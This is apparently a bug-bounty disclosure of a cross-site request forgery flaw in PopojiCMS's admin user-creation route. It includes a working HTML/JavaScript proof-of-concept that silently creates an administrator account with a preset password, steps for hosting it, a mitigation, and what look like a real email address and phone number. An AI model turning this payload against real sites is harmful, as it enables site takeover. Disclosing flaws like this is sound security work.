Description:
This is happen because when request add admin there’s no CSRF token
Step To Reproduce :
<script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button>Let's Rock</button>
1. Save code to .html
2. upload them to host
3. execute it.
Video :
https://www.youtube.com/watch?v=1FXXuSiB6jo
Fix & Mitigation :
give token when request sensitive action.
Note:
them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !